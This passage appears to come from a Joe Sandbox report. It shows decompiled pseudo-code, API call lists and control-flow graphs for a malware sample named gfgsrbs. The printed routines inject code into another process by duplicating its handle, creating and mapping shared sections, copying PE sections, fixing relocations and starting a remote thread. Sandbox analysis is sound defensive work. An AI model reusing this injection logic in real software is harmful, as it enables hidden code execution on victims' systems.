                      											_t176 =  *_t196;
                      											_t196 = _t196 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t197);
                      										_t174 = 0;
                      										__eflags = 0;
                      										_t108 = _t201 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                      									} else {
                      										L54();
                      										_pop(_t177);
                      										_t174 = _t177 - 0x1760;
                      										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                      										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t174, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                      • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                      • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 197 4014da-4014f1 call 40119e 203 4014f3 197->203 204 4014f6-4014fb 197->204 203->204 206 401501-401512 204->206 207 401824-40182c 204->207 211 401822 206->211 212 401518-401541 206->212 207->204 210 401831-401842 207->210 214 401845-401866 call 40119e 210->214 215 401838-40183e 210->215 211->210 212->211 222 401547-40155e NtDuplicateObject 212->222 215->214 222->211 223 401564-401588 NtCreateSection 222->223 225 4015e4-40160a NtCreateSection 223->225 226 40158a-4015ab NtMapViewOfSection 223->226 225->211 229 401610-401614 225->229 226->225 228 4015ad-4015c9 NtMapViewOfSection 226->228 228->225 230 4015cb-4015e1 228->230 229->211 231 40161a-40163b NtMapViewOfSection 229->231 230->225 231->211 232 401641-40165d NtMapViewOfSection 231->232 232->211 234 401663 call 401668 232->234
                      C-Code - Quality: 62%
                      			E004014DA(void* __ebx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t130;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t159;
                      				signed int _t160;
                      				signed int _t161;
                      				void* _t162;
                      				intOrPtr* _t163;
                      				void* _t166;
                      				long _t174;
                      				intOrPtr _t176;
                      				void* _t177;
                      				long* _t183;
                      				intOrPtr* _t185;
                      				HANDLE* _t186;
                      				HANDLE* _t187;
                      				void* _t192;
                      				void* _t193;
                      				intOrPtr* _t196;
                      				void* _t197;
                      				void* _t200;
                      				void* _t201;
                      				intOrPtr* _t203;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				_pop(_t84);
                      				_push(0x37f);
                      				_t130 =  *_t203;
                      				_t204 = _t203 + 4;
                      				L0040119E(_t84, _t130, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t201 + 8));
                      				_t174 = 0;
                      				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
                      				_t183 = _t201 - 0x60;
                      				 *_t183 = _t174;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
                      				_t90 =  *_t183;
                      				if(_t90 != 0) {
                      					_t132 = _t201 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t174;
                      					_t185 = _t201 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
                      					 *_t185 = 0x18;
                      					_push(_t201 - 0x30);
                      					_push(_t185);
                      					_push(0x40);
                      					_push(_t201 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
                      						 *(_t201 - 8) = _t174;
                      						_t98 = _t201 - 0x50;
                      						 *(_t98 + 4) = _t174;
                      						 *_t98 = 0x5000;
                      						_t186 = _t201 - 0x54;
                      						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
                      							 *_t25 =  *(_t201 - 0x50);
                      							_t121 = _t201 - 0x44;
                      							 *_t121 = _t174;
                      							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t123 = _t201 - 0x3c;
                      								 *_t123 = _t174;
                      								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      									_t200 =  *(_t201 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
                      									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                      									 *(_t201 - 8) =  *(_t201 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t201 - 0x50;
                      						 *(_t100 + 4) = _t174;
                      						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                      						_t187 = _t201 - 0x58;
                      						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
                      							 *_t46 =  *(_t201 - 0x50);
                      							_t102 = _t201 - 0x48;
                      							 *_t102 = _t174;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
                      								_t104 = _t201 - 0x40;
                      								 *_t104 = _t174;
                      								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
                      								if(_t224 == 0) {
                      									L18();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t159 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t160 = _t159;
                      									asm("loop 0xffffffc2");
                      									_t161 = _t160 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t161;
                      									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                      									_t139 =  *(_t192 + 6) & 0x0000ffff;
                      									_push(_t192);
                      									_t162 = _t192;
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_t163 = _t162 + 0xf8;
                      										__eflags = _t163;
                      									} else {
                      										_t163 = _t162 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t163 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t193);
                      									_t229 =  *((intOrPtr*)(_t201 - 0x34));
                      									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                      										_push(_t193);
                      										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
                      										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
                      										__eflags = _t196;
                      										while(1) {
                      											__eflags =  *_t196;
                      											if( *_t196 == 0) {
                      												break;
                      											}
                      											_t176 =  *_t196;
                      											_t196 = _t196 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t197);
                      										_t174 = 0;
                      										__eflags = 0;
                      										_t108 = _t201 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
                      									} else {
                      										L51();
                      										_pop(_t177);
                      										_t174 = _t177 - 0x1760;
                      										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
                      										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t174, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                      • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                      • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 236 4014dd-4014f1 call 40119e 240 4014f3 236->240 241 4014f6-4014fb 236->241 240->241 243 401501-401512 241->243 244 401824-40182c 241->244 248 401822 243->248 249 401518-401541 243->249 244->241 247 401831-401842 244->247 251 401845-401866 call 40119e 247->251 252 401838-40183e 247->252 248->247 249->248 259 401547-40155e NtDuplicateObject 249->259 252->251 259->248 260 401564-401588 NtCreateSection 259->260 262 4015e4-40160a NtCreateSection 260->262 263 40158a-4015ab NtMapViewOfSection 260->263 262->248 266 401610-401614 262->266 263->262 265 4015ad-4015c9 NtMapViewOfSection 263->265 265->262 267 4015cb-4015e1 265->267 266->248 268 40161a-40163b NtMapViewOfSection 266->268 267->262 268->248 269 401641-40165d NtMapViewOfSection 268->269 269->248 271 401663 call 401668 269->271
                      C-Code - Quality: 63%
                      			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
                      				void* _t84;
                      				intOrPtr _t87;
                      				long _t90;
                      				void* _t91;
                      				struct _GUID _t98;
                      				struct _GUID _t100;
                      				PVOID* _t102;
                      				PVOID* _t104;
                      				intOrPtr _t106;
                      				intOrPtr* _t108;
                      				PVOID* _t121;
                      				PVOID* _t123;
                      				intOrPtr _t128;
                      				intOrPtr _t131;
                      				long* _t132;
                      				signed int _t139;
                      				int _t140;
                      				signed int _t160;
                      				signed int _t161;
                      				signed int _t162;
                      				void* _t163;
                      				intOrPtr* _t164;
                      				void* _t167;
                      				long _t175;
                      				intOrPtr _t177;
                      				void* _t178;
                      				long* _t184;
                      				intOrPtr* _t186;
                      				HANDLE* _t187;
                      				HANDLE* _t188;
                      				void* _t193;
                      				void* _t194;
                      				intOrPtr* _t197;
                      				void* _t198;
                      				void* _t201;
                      				void* _t202;
                      				intOrPtr* _t204;
                      				void* _t207;
                      				intOrPtr* _t208;
                      				void* _t209;
                      				long _t224;
                      
                      				L0040119E(_t84, __ecx, __edi, __eflags);
                      				_t128 =  *((intOrPtr*)(_t202 + 8));
                      				_t175 = 0;
                      				 *((intOrPtr*)(_t202 - 0x34)) = 0;
                      				if(gs != 0) {
                      					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
                      				}
                      				while(1) {
                      					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
                      					if(_t87 != 0) {
                      						break;
                      					}
                      					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                      				}
                      				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
                      				_t184 = _t202 - 0x60;
                      				 *_t184 = _t175;
                      				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
                      				_t90 =  *_t184;
                      				if(_t90 != 0) {
                      					_t132 = _t202 - 0x30;
                      					 *_t132 = _t90;
                      					_t132[1] = _t175;
                      					_t186 = _t202 - 0x28;
                      					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
                      					 *_t186 = 0x18;
                      					_push(_t202 - 0x30);
                      					_push(_t186);
                      					_push(0x40);
                      					_push(_t202 - 0x10);
                      					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
                      						 *(_t202 - 8) = _t175;
                      						_t98 = _t202 - 0x50;
                      						 *(_t98 + 4) = _t175;
                      						 *_t98 = 0x5000;
                      						_t187 = _t202 - 0x54;
                      						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
                      							 *_t25 =  *(_t202 - 0x50);
                      							_t121 = _t202 - 0x44;
                      							 *_t121 = _t175;
                      							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      								_t123 = _t202 - 0x3c;
                      								 *_t123 = _t175;
                      								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      									_t201 =  *(_t202 - 0x44);
                      									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
                      									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
                      									 *(_t202 - 8) =  *(_t202 - 8) + 1;
                      								}
                      							}
                      						}
                      						_t100 = _t202 - 0x50;
                      						 *(_t100 + 4) = _t175;
                      						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
                      						_t188 = _t202 - 0x58;
                      						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
                      							 *_t46 =  *(_t202 - 0x50);
                      							_t102 = _t202 - 0x48;
                      							 *_t102 = _t175;
                      							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
                      								_t104 = _t202 - 0x40;
                      								 *_t104 = _t175;
                      								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
                      								if(_t224 == 0) {
                      									L16();
                      									if(_t224 == 0 && _t224 != 0) {
                      									}
                      									_t207 = _t204 + 4;
                      									_push(0x2e62);
                      									_t208 = _t207 + 4;
                      									_push(0x2260);
                      									_t106 =  *_t208;
                      									_t209 = _t208 + 4;
                      									_t160 = (0x2260 << 5) + _t106;
                      									asm("lodsb");
                      									_t161 = _t160;
                      									asm("loop 0xffffffc2");
                      									_t162 = _t161 ^ 0xbcc951dd;
                      									_t204 = _t209 - _t162;
                      									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
                      									_t139 =  *(_t193 + 6) & 0x0000ffff;
                      									_push(_t193);
                      									_t163 = _t193;
                      									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                      										_t164 = _t163 + 0xf8;
                      										__eflags = _t164;
                      									} else {
                      										_t164 = _t163 + 0x108;
                      									}
                      									_push(_t139);
                      									_t140 =  *(_t164 + 0x10);
                      									if(_t140 != 0) {
                      										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
                      										_t204 = _t204 + 0xc;
                      									}
                      									asm("loop 0xffffffe6");
                      									_pop(_t194);
                      									_t229 =  *((intOrPtr*)(_t202 - 0x34));
                      									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
                      										_push(_t194);
                      										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
                      										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
                      										__eflags = _t197;
                      										while(1) {
                      											__eflags =  *_t197;
                      											if( *_t197 == 0) {
                      												break;
                      											}
                      											_t177 =  *_t197;
                      											_t197 = _t197 + 8;
                      											asm("lodsw");
                      											__eflags = 0;
                      											if(0 != 0) {
                      												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
                      												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
                      											}
                      											asm("loop 0xffffffe9");
                      										}
                      										_pop(_t198);
                      										_t175 = 0;
                      										__eflags = 0;
                      										_t108 = _t202 - 4;
                      										 *_t108 = 0;
                      										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
                      									} else {
                      										L49();
                      										_pop(_t178);
                      										_t175 = _t178 - 0x1760;
                      										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
                      										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
                      										0x33();
                      										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
                      										0x33();
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				_t91 = 0x14e3;
                      				_push(0x37f);
                      				_t131 =  *_t204;
                      				return L0040119E(_t91, _t131, _t175, _t229);
                      			}

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction ID: c414ae2dcce1999d5ff69eab83f34e0e1241aa209a2fbae03b06ced14e898130
                      • Opcode Fuzzy Hash: c7ae0998d8d661ccf688133248b2e1d84d0a8d2d586b58feb6ff111a8af814fa
                      • Instruction Fuzzy Hash: 085106B1900249BFEF219F91CC48FEFBBB9EF85B10F104119FA11AA2A5D7709940CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 273 40e703-40e712 275 40e714-40e717 273->275 276 40e718-40e71b 273->276 277 40e72b-40e734 call 4111b8 276->277 278 40e71d-40e722 276->278 281 40e739-40e73e 277->281 278->278 279 40e724-40e729 278->279 279->277 279->278 282 40e740-40e74c 281->282 283 40e74d-40e758 281->283 283->282
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: __malloc_crt
                      • String ID:
                      • API String ID: 3464615804-0
                      • Opcode ID: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction ID: fc55ce3b648994ae0669cb83a6c03f413a82d86dd79d98679187b4526597e74b
                      • Opcode Fuzzy Hash: 501dda1f62610471c31aec79cd889d8af2f544a4fc306c4e666a9dbeabe91d77
                      • Instruction Fuzzy Hash: 92F09E339001205DD720773A3C048770629DAC63693150C3BF692E3281F6380C8342E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 286 40e7ac-40e7ce HeapCreate 287 40e7d0-40e7d1 286->287 288 40e7d2-40e7db 286->288
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040E7C1
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction ID: cc9ea7525e2f4401f88430c5405be3d1bc70efe095c2ac504a773410bf562ff0
                      • Opcode Fuzzy Hash: b393221473d5128b1f0148c2de5562a25426e395ddf46944ff430698e6d466b0
                      • Instruction Fuzzy Hash: 96D05E369583445EEB105FB56D087623BDCD784795F049436B90CDA6A0E674C650DA44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 289 40a0cd-40a0cf call 40a05b 291 40a0d4-40a0d5 289->291
                      APIs
                      • __encode_pointer.LIBCMT ref: 0040A0CF
                        • Part of subcall function 0040A05B: RtlEncodePointer.NTDLL(?), ref: 0040A0C2
                      Memory Dump Source
                      • Source File: 00000004.00000002.439518927.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_409000_gfgsrbs.jbxd
                      Similarity
                      • API ID: EncodePointer__encode_pointer
                      • String ID:
                      • API String ID: 4150071819-0
                      • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction ID: 50ed121f21e01714d4d4106e0456cc313bcbcd0e045e12985174d0a2d6778b00
                      • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 292 401869-4018bd call 40119e Sleep call 4013d8 303 4018cc-401907 call 40119e 292->303 304 4018bf-4018c7 call 4014a8 292->304 304->303
                      C-Code - Quality: 62%
                      			E00401869(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				char _v8;
                      				void* __edi;
                      				void* __ebp;
                      				intOrPtr _t8;
                      				void* _t11;
                      				intOrPtr _t13;
                      				intOrPtr* _t16;
                      				signed char _t19;
                      				void* _t20;
                      				intOrPtr* _t21;
                      				intOrPtr* _t22;
                      
                      				_t24 = __eflags;
                      				_push(0x18a0);
                      				_t8 =  *_t21;
                      				_t22 = _t21 + 4;
                      				L0040119E(_t8, 0x63, _t20, __eflags);
                      				_t16 = _a4;
                      				Sleep(0x1388);
                      				_t11 = E004013D8(_t19, _t24, _t16, _a8, _a12,  &_v8); // executed
                      				_t25 = _t11;
                      				if(_t11 != 0) {
                      					E004014A8(_t25, _t16, _t11, _v8, _a16); // executed
                      				}
                      				 *_t16(0xffffffff, 0);
                      				_push(0x18a0);
                      				_t13 =  *_t22;
                      				return L0040119E(_t13, 0x63, _t20, _t25);
                      			}

                      APIs
                      • Sleep.KERNELBASE(00001388), ref: 004018A8
                        • Part of subcall function 004014A8: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                        • Part of subcall function 004014A8: NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                        • Part of subcall function 004014A8: NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$CreateDuplicateObjectSleepView
                      • String ID:
                      • API String ID: 1885482327-0
                      • Opcode ID: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction ID: 60862f2667b59bfd2b53fd736c2ec37b6a52218a42a16e6e58fdf04961db7cc8
                      • Opcode Fuzzy Hash: 6296850e33a145ab6595ce586122c29eccd5567035ad5b983bd76f19fb0b0644
                      • Instruction Fuzzy Hash: 79015E37608204E7E7007A95DC8197A37699B45354F208137BA13791E1D63D9B12A76B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 315 40188b-4018bd call 40119e Sleep call 4013d8 322 4018cc-401907 call 40119e 315->322 323 4018bf-4018c7 call 4014a8 315->323 323->322
                      C-Code - Quality: 62%
                      			E0040188B(signed char __eax, void* __ebx, void* __edx, void* __edi, void* __eflags) {
                      				void* _t13;
                      				intOrPtr _t15;
                      				intOrPtr* _t19;
                      				signed char _t24;
                      				void* _t28;
